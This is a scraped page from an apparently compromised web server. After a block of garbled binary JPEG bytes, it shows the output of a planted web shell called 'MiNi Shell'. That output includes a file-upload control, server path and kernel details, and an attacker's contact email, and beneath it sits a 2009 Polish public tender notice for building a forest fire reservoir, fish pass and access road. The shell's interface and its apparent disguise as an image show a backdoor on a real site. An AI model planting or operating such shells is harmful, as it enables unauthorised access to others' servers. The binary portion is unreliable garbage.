JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090717/243434-N-2009.html

<p class="kh_header"><b>Siewierz: Budowa zbiornika przeciwpożarowego wraz z dojazdem w leśnictwie Kuźnica, gmina Łazy</b><br>
<b>Numer ogłoszenia: 243434 - 2009; data zamieszczenia: 17.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Siewierz , Łysa Góra 6, 42-470 Siewierz, woj. śląskie, tel. 032 6742957, 6742958, faks 032 6741160.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.katowice.lasy.gov.pl/siewierz</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna Skarbu Państwa nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa zbiornika przeciwpożarowego wraz z dojazdem w leśnictwie Kuźnica, gmina Łazy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa zbiornika małej retencji wodnej wraz z urządzeniami wodnymi niezbędnymi do właściwego gospodarowania wodą w zbiorniku oraz przepławką dla ryb. Elementem całości zamówienia jest również wybudowanie drogi dojazdowej zakończonej placem manewrowym ze studzienką do nabierania wody do celów przeciwpożarowych.

A.	Zbiornik wodny.
Teren pod inwestycję położony jest w obrębie miejscowości Chruszczobród, na obszarze leśnym należącym do Nadleśnictwa Siewierz, w leśnictwie Kuźnica, w oddz. 135a i 135d. Działki ewidencyjne nr 3951 i 3952 w obrębie ewidencyjnym Chruszczobród na których planowana jest budowa zbiornika to działki leśne, stanowiące zabagnioną i nie użytkowaną enklawę. Przez teren przeznaczony pod zbiornik przepływa rzeka Mitręga (działka ewidencyjna nr 3964) w wyraźnej dolinie, której szerokość wynosi od ok. 90 - 110 m. Rzeka na tym odcinku jest nieuregulowana, tworzy wyraźne meandry. Obszar doliny porośnięty jest drzewostanem charakterystycznym dla terenów podmokłych. 
Na omawianym obszarze brak jest zagospodarowania mogącego kolidować z zamierzonym przedsięwzięciem, w rodzaju uzbrojenia podziemnego lub naziemnego, jak linie energetyczne, telekomunikacyjne, sieci gazowe, i inne. Brak jest również stanowisk archeologicznych i elementów architektury, wpisanych do rejestru zabytków. 

Projektowane zagospodarowanie terenu części działek o numerach 3951 i 3952 w Chruszczobrodzie stanowić będą:
1.	Zbiornik wodny o następujących parametrach:
-wymiary w dnie: długość (wzdłuż rzeki Mitręgi)- ok. 200 m, szerokość od ok. 63m do ok. 90m,
-powierzchnia lustra wody	1,82 ha
-pojemność	21,7 tys. m3
-rzędna lustra wody	298,30 m npm 
-głębokość	od 1,18 do 1,30 m (średnia 1,24 m)
-nachylenie skarp	od 1 :3 do pochylenia naturalnego.


2. Zapora czołowa w formie grobli ziemnej, przegradzająca dolinę rzeki Mitręgi w km 3+850 o parametrach:
- długość grobli -114 mb,
- szerokość korony 4,0 m - przy ustalaniu tej wartości kierowano się m.in. potrzebą łatwej komunikacji po koronie, w razie konieczności wykonywania konserwacji i remontów grobli,
-nachylenie skarp - odwodnej 1 : 3, a odpowietrznej 1 :2 - są to zalecane nachylenia skarp grobli zewnętrznych (oporowych) dla gruntu, który będzie do dyspozycji w trakcie wykonawstwa,
- rzędna korony grobli wynosi 299,00 m npm - a więc wzniesienie korony grobli nad normalnym poziomem wody w zbiorniku wynosi 0,70 m - dla budowli klasy IV minimalne wzniesienie korony nad NPP winno wynosić 0,70 m.

3.	Mnich piętrząco-spustowy w korpusie zapory o parametrach:
- wysokość piętrzenia (od progu)	h -1,30 m, 
- piętrzenie (różnica wody górnej i dolnej)	0,99 m,
- przekrój stojaka	120 x 100 cm,
- średnica leżaka	100 cm,
- rzędna progu	297,00 m npm,
- rzędna normalnego poziomu piętrz. (NPP)       298,30 m npm.

4.	Przelew burzowy (przewał) przez groblę czołową.
5.	Rów odpływowy do Mitręgi poniżej zapory wraz z ubezpieczeniem.
6.	Kanał odpływowy z przelewu burzowego wraz z ubezpieczeniem.
7.	Ujęcie wody do celów przeciwpożarowych w formie studzienki ssawnej O 0,80 m, na placu manewrowym o wymiarach 20,0 m x 20,0 m.

B. Przepławka dla ryb

Projektowaną przepławkę dla ryb planuje się zlokalizować w grobli czołowej projektowanego zbiornika małej retencji wodnej. Projektuje się przepławkę w formie żelbetowej rynny, przecinającej prostopadle korpus grobli czołowej zbiornika. Jest to przepławka komorowa, z otworami przesmykowymi dla ryb. Zaprojektowane parametry przepławki i właściwe umiejscowienie wylotu do rowu odpływowego umożliwią rybom przemieszczanie się zarówno w górę, jak i w dół rzeki. W celu bezpiecznego poruszania się po koronie zapory, przez przepławkę projektuje się żelbetową płytę, wyposażoną w poręcze z rurki stalowej O30 mm, wys. 1,10 m. 
Wszystkie elementy ścian i dna przepławki projektuje się o grub. 0,20 m, z betonu klasy B-20. Podłoże wyrównawcze pod płytę denną grub. 0,10 m wykonane będzie z chudego betonu klasy B 7,5. Zbrojenie dna i progów z prętów stalowych skośnie żebrowanych O 8 mm, a ścian i płyty komunikacyjnej - O 10 mm, siatką 15 cm x 15 cm.

C. Droga dojazdowa z placem manewrowym 

W chwili obecnej na części projektowanej nowej drogi znajduje się istniejąca dróżka, powstała poprzez ubicie się gruntu oraz częściowe wzmocnienie żużlem. Na części projektowanego przebiegu brak jest istniejącej drogi, która się urywa i resztę drogi do zbiornika trzeba pokonywać pieszo. Droga w swoim obecnym stanie nie spełnia wymogów dla dróg pożarowych, jest za wąska, kręta, rozjeżdżona, oraz miejscami zatarasowana poprzez pochylające się nad drogę pnie drzew. Droga posiada zakręty o promieniu niemożliwym do pokonania przez wóz straży pożarnej. Dodatkowo w okresie ulewnych deszczy zostaje praktycznie miejscowo zalewana przez spływające z wyżej położonych obszarów wody opadowe - poziom wody kształtuje się w poziomie terenu. Teren ogólnie płaski z niewielkimi pochyleniami w swojej większej części suchy, lub lekko mokry.

Podstawowe dane techniczne -założenia do projektowania
1.	Długość całkowita drogi	- 109,00 mb + 20 x 20 m płac manewrowy
2.	Szerokość pasa drogowego	- 4,00 m
3.	Szerokość jezdni	- 3,00 m
4.	Szerokość poboczy	- 0,50 m
5.	.Pochylenie poprzeczne jezdni	- 3 %
6.	Maksymalne pochylenie niwelety	- l %
7.	Łuki poziome (min, max)	- 330 m
8.	Łuki pionowe ( min ,max )	- brak
9.	Rodzaj nawierzchni	- twarda nie ulepszona (żużlowa)
10.	Założona konstrukcja nawierzchni
-	warstwa górnej podbudowy z żużla o frakcji 0-16  mm-3 cm
-	warstwa dolnej podbudowy z żużla o frakcji 16-63 mm -27 cm
11.	Prędkość projektowa - max 30 km/h
12.	Kategoria gruntu podłoża-Gl
13.	Warunki wodne - przeciętne
14.	Obciążenie ruchem - ruch lekki
15.	Nośność nawierzchni-16 ton

D. Wskazanie szczegółowego opisu zamówienia
Wykonywane roboty budowlane można podzielić na następujące etapy:
1.	roboty przygotowawcze:
a)	wytyczenie geodezyjne trasy i budowli
b)	wycinka drzew i krzewów
2.	roboty ziemne mechaniczne i ręczne
3.	wykonanie mnicha monolitycznego , studzienki ssawnej, przepławki dla ryb. 
4.	wykonanie nawierzchni drogowej wraz placem manewrowym oraz elementów towarzyszących
5.	roboty wykończeniowe
6.	przygotowanie dokumentacji odbiorowej i powykonawczej.
Wykonawca zobligowany jest dokonać zmian zakresie rodzaju użytku w Państwowej Ewidencji Gruntów wynikających z wybudowania zbiornika wodnego. 

Szczegółowo przedmiot zamówienia określony został w  SIWZ, dokumentacji technicznej wykonania zamówienia  i umowie stanowiących załącznik do niniejszej SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.24.72.70-3, 45.24.72.30-1, 45.23.31.20-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.  Oferta musi być zabezpieczona wadium o wartości:
		6 000zł ; słownie : sześć tysięcy złotych 
2. Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert, 
tj. do dnia 06 sierpnia 2009 r. do godz. 1400 
Pozostałe warunki dotyczące wadium zawiera SIWZ, dostępna na internetowej stronie informacyjnej Zamawiającego<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
1.	O zamówienie mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień Publicznych, spełniają wymogi  art. 22 ust.1 ustawy 
2.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień 
3.	Posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia:
a)	Dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia. W szczególności należy wykazać osobę i udokumentować jej uprawnienia do kierowania robotami w specjalności wodnomelioracyjnej lub hydrotechnicznej oraz jej przynależność do odpowiedniej Izby Inżynierów  Budownictwa.
b)	Dysponują potencjałem technicznym lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego do wykonania zamówienia. W szczególności należy wykazać: równiarka - 1 szt., walec drogowy - 1 szt., samochód  ciężarowy- 1 szt., koparka lub  koparko - ładowarka -2szt., spycharka 1 szt., ciągnik 1 szt.
c)	Wykonali budowy z zakresu  robót wodno melioracyjnych o wartości minimum  500 000 zł brutto w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest krótszy w tym okresie.
4.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia potwierdzone posiadaniem aktualnego ubezpieczenia od odpowiedzialności cywilnej, w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczeniową nie mniejszą niż 50 000,00 potwierdzone polisą, a w przypadku jej braku innym dokumentem potwierdzającym, że Wykonawca ubezpieczony jest od odpowiedzialności cywilnej w zakresie prowadzonej działalności za szkody oraz następstwa nieszczęśliwych wypadków dotyczących pracowników i osób trzecich a powstałych w związku z prowadzonymi robotami budowlanymi, w tym także ruchem pojazdów mechanicznych.
5.	Ocena spełniania w.w. warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w wyszczególnionych dokumentach i oświadczeniach . Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w.w. warunki wykonawca spełnił.
Nie spełnienie chociażby jednego z w.w. warunków skutkować będzie wykluczeniem wykonawcy z postępowania, a ofertę uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1 Oferta musi zawierać niżej wymienione dokumenty.
1)	Wypełniony formularz ofertowy wg załączonego druku  (załącznik. nr 1. SIWZ)
2)	 Kosztorys ofertowy sporządzony w oparciu  o przedmiary robót podane w dokumentacji technicznej załączonej do SIWZ, z określeniem końcowej kwoty netto i brutto wykonania całości zadania.
3)	Aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, potwierdzający prowadzenie działalności gospodarczej w zakresie prac objętych niniejszym zamówieniem (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert), 
4)	Oświadczenie, że wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust. 1 ustawy (na formularzu ofertowym -załącznik. nr 1 do SIWZ);
5)	Aktualną informacje z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt. 4 -8 ustawy (wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert), dotycząca:
- osób fizycznych ( współwłaścicieli spółek, właścicieli firm ),
-      urzędujących członków władz osób prawnych.
6)	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy (wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert); 

7)	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków i opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert)
 



8)	Aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że nie zalega z opłacaniem składek na ubezpieczenie społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert);

9)	Wykaz osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności (wg załącznika nr 2 do SIWZ); Do niniejszego wykazu należy dołączyć pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie wykonawca wskazał osoby, którymi będzie dysponował. 
Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (dołączyć do wykazu osób tj. do załącznika nr 2 do SIWZ). 
W szczególności należy wykazać osobę i udokumentować jej uprawnienia do kierowania robotami w specjalności wodnomelioracyjnej lub hydrotechnicznej oraz jej przynależność do odpowiedniej Izby Inżynierów Budownictwa.

10)	Wykaz wykonanych zamówień na budowy z zakresu  robót wodno melioracyjnych, o wartości minimum  500 000 zł brutto, w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia.  Jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Do wykazu należy dołączyć dokumenty (opinie, zaświadczenia, referencje  itp) z których jasno wynika wartość wykonanych robót, przedmiot robót, daty i miejsca ich wykonania oraz to, że roboty  te zostały wykonane należycie (wg załącznika nr 3 do SIWZ). Nie istnieje potrzeba dokumentowania prac wykonanych w Nadleśnictwie Siewierz;

11)	 Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca. Jeżeli w wykazie wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował do wykazu należy dołączyć pisemne zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń. równiarka - 1 szt., walec drogowy - 1 szt., samochód  ciężarowy- 1 szt., koparka lub  koparko - ładowarka -2szt., spycharka 1 szt., ciągnik 1 szt. (wg załącznika nr 4 do SIWZ).

12)	Polisę a w przypadku jej braku inny dokument potwierdzający, że Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia nie mniejszą niż 50 000,00 zł. za szkody oraz następstwa nieszczęśliwych wypadków dotyczących pracowników i osób trzecich a powstałych w związku z prowadzonymi robotami budowlanymi, w tym także ruchem pojazdów mechanicznych.

13)	Zaparafowany wzór umowy - załącznik nr 8 do SIWZ
14)	Pełnomocnictwo dla lidera podmiotów występujących wspólnie np. konsorcjum (o ile dotyczy)  z którego jasno wynika zakres umocowania do reprezentowania konsorcjum, w postępowaniu oraz do zawarcia umowy o udzielenie przedmiotowego zamówienia.


2, Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej wykonawca składa dokumenty zgodnie z przepisami rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r w sprawie rodzajów dokumentów , jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane (Dz.U. nr 87 poz. 605 z 2006 r z późniejszymi zmianami)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.katowice.lasy.gov.pl/web/siewierz.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PGL LP Nadleśnictwo Siewierz
ul. Łysa Góra 6 
42-470 Siewierz.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2009 godzina 14:00, miejsce: PGL LP Nadleśnictwo Siewierz
ul. Łysa Góra 6 
42-470 Siewierz

sekretariat pokój nr 10.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Uwaga! Zamówienie jest realizowane w dwóch etapach.  

do 10 XI 2009 I etap
do 31 V  2010 II etap

Creat By MiNi SheLL
Email: jattceo@gmail.com